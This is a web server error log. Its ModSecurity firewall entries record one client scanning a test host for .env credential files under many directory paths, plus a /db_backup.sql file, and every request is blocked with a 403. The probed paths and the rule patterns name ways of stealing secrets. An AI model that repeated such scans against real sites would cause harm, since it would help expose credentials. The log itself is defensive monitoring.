[Mon Jan 12 15:43:23.739735 2026] [:error] [pid 1355923] [client 18.183.223.70:43684] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWUIiyE1xEBhFyXickXrswAAAAA"]
[Mon Jan 12 15:43:23.739954 2026] [:error] [pid 1355923] [client 18.183.223.70:43684] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWUIiyE1xEBhFyXickXrswAAAAA"]
[Mon Jan 12 15:43:23.740128 2026] [:error] [pid 1355923] [client 18.183.223.70:43684] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWUIiyE1xEBhFyXickXrswAAAAA"]
[Mon Jan 12 15:43:24.466907 2026] [:error] [pid 1362233] [client 18.183.223.70:43828] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWUIjH2DuVtAKraH1YOOBwAAAAk"]
[Mon Jan 12 15:43:24.467125 2026] [:error] [pid 1362233] [client 18.183.223.70:43828] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWUIjH2DuVtAKraH1YOOBwAAAAk"]
[Mon Jan 12 15:43:24.467307 2026] [:error] [pid 1362233] [client 18.183.223.70:43828] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWUIjH2DuVtAKraH1YOOBwAAAAk"]
[Mon Jan 12 15:43:25.196980 2026] [:error] [pid 1356126] [client 18.183.223.70:43966] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWUIjTv8xyMiuvwfNnlkAQAAAAU"]
[Mon Jan 12 15:43:25.197216 2026] [:error] [pid 1356126] [client 18.183.223.70:43966] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWUIjTv8xyMiuvwfNnlkAQAAAAU"]
[Mon Jan 12 15:43:25.197367 2026] [:error] [pid 1356126] [client 18.183.223.70:43966] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aWUIjTv8xyMiuvwfNnlkAQAAAAU"]
[Mon Jan 12 15:43:25.924878 2026] [:error] [pid 1358564] [client 18.183.223.70:44094] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWUIjR_UgGRJ4jDk47tQmQAAAAY"]
[Mon Jan 12 15:43:25.925096 2026] [:error] [pid 1358564] [client 18.183.223.70:44094] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWUIjR_UgGRJ4jDk47tQmQAAAAY"]
[Mon Jan 12 15:43:25.925263 2026] [:error] [pid 1358564] [client 18.183.223.70:44094] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kubernetes/.env"] [unique_id "aWUIjR_UgGRJ4jDk47tQmQAAAAY"]
[Mon Jan 12 15:43:26.650059 2026] [:error] [pid 1355925] [client 18.183.223.70:44238] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWUIjk7thAymmecRvtl00AAAAAI"]
[Mon Jan 12 15:43:26.650307 2026] [:error] [pid 1355925] [client 18.183.223.70:44238] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWUIjk7thAymmecRvtl00AAAAAI"]
[Mon Jan 12 15:43:26.650522 2026] [:error] [pid 1355925] [client 18.183.223.70:44238] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aWUIjk7thAymmecRvtl00AAAAAI"]
[Mon Jan 12 15:43:27.375217 2026] [:error] [pid 1355924] [client 18.183.223.70:44376] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWUIj9IpinFXoPzDav5wkwAAAAE"]
[Mon Jan 12 15:43:27.375420 2026] [:error] [pid 1355924] [client 18.183.223.70:44376] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWUIj9IpinFXoPzDav5wkwAAAAE"]
[Mon Jan 12 15:43:27.375581 2026] [:error] [pid 1355924] [client 18.183.223.70:44376] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWUIj9IpinFXoPzDav5wkwAAAAE"]
[Mon Jan 12 15:43:28.104688 2026] [:error] [pid 1355926] [client 18.183.223.70:44536] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWUIkMC2y5bYy1r2HoPzegAAAAM"]
[Mon Jan 12 15:43:28.107057 2026] [:error] [pid 1355926] [client 18.183.223.70:44536] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWUIkMC2y5bYy1r2HoPzegAAAAM"]
[Mon Jan 12 15:43:28.107238 2026] [:error] [pid 1355926] [client 18.183.223.70:44536] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aWUIkMC2y5bYy1r2HoPzegAAAAM"]
[Mon Jan 12 15:43:28.832190 2026] [:error] [pid 1365295] [client 18.183.223.70:44686] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWUIkA7npFhQv7HWuOad0QAAAAo"]
[Mon Jan 12 15:43:28.832388 2026] [:error] [pid 1365295] [client 18.183.223.70:44686] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWUIkA7npFhQv7HWuOad0QAAAAo"]
[Mon Jan 12 15:43:28.832539 2026] [:error] [pid 1365295] [client 18.183.223.70:44686] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWUIkA7npFhQv7HWuOad0QAAAAo"]
[Mon Jan 12 15:43:29.558965 2026] [authz_core:error] [pid 1365300] [client 18.183.223.70:44828] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Mon Jan 12 15:43:30.293337 2026] [:error] [pid 1362231] [client 18.183.223.70:44986] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWUIksuCkgRo958sQERiRwAAAAc"]
[Mon Jan 12 15:43:30.293542 2026] [:error] [pid 1362231] [client 18.183.223.70:44986] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWUIksuCkgRo958sQERiRwAAAAc"]
[Mon Jan 12 15:43:30.293715 2026] [:error] [pid 1362231] [client 18.183.223.70:44986] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aWUIksuCkgRo958sQERiRwAAAAc"]
[Mon Jan 12 15:43:31.018173 2026] [:error] [pid 1355923] [client 18.183.223.70:45146] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWUIkyE1xEBhFyXickXrtAAAAAA"]
[Mon Jan 12 15:43:31.018425 2026] [:error] [pid 1355923] [client 18.183.223.70:45146] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWUIkyE1xEBhFyXickXrtAAAAAA"]
[Mon Jan 12 15:43:31.018578 2026] [:error] [pid 1355923] [client 18.183.223.70:45146] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aWUIkyE1xEBhFyXickXrtAAAAAA"]
[Mon Jan 12 15:43:31.750051 2026] [:error] [pid 1362233] [client 18.183.223.70:45298] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWUIk32DuVtAKraH1YOOCAAAAAk"]
[Mon Jan 12 15:43:31.750272 2026] [:error] [pid 1362233] [client 18.183.223.70:45298] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWUIk32DuVtAKraH1YOOCAAAAAk"]
[Mon Jan 12 15:43:31.750466 2026] [:error] [pid 1362233] [client 18.183.223.70:45298] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWUIk32DuVtAKraH1YOOCAAAAAk"]
[Mon Jan 12 15:43:32.478268 2026] [:error] [pid 1356126] [client 18.183.223.70:45482] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWUIlDv8xyMiuvwfNnlkAgAAAAU"]
[Mon Jan 12 15:43:32.478605 2026] [:error] [pid 1356126] [client 18.183.223.70:45482] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWUIlDv8xyMiuvwfNnlkAgAAAAU"]
[Mon Jan 12 15:43:32.478763 2026] [:error] [pid 1356126] [client 18.183.223.70:45482] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWUIlDv8xyMiuvwfNnlkAgAAAAU"]
[Mon Jan 12 15:43:33.210367 2026] [:error] [pid 1358564] [client 18.183.223.70:45650] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWUIlR_UgGRJ4jDk47tQmgAAAAY"]
[Mon Jan 12 15:43:33.210582 2026] [:error] [pid 1358564] [client 18.183.223.70:45650] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWUIlR_UgGRJ4jDk47tQmgAAAAY"]
[Mon Jan 12 15:43:33.211693 2026] [:error] [pid 1358564] [client 18.183.223.70:45650] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWUIlR_UgGRJ4jDk47tQmgAAAAY"]
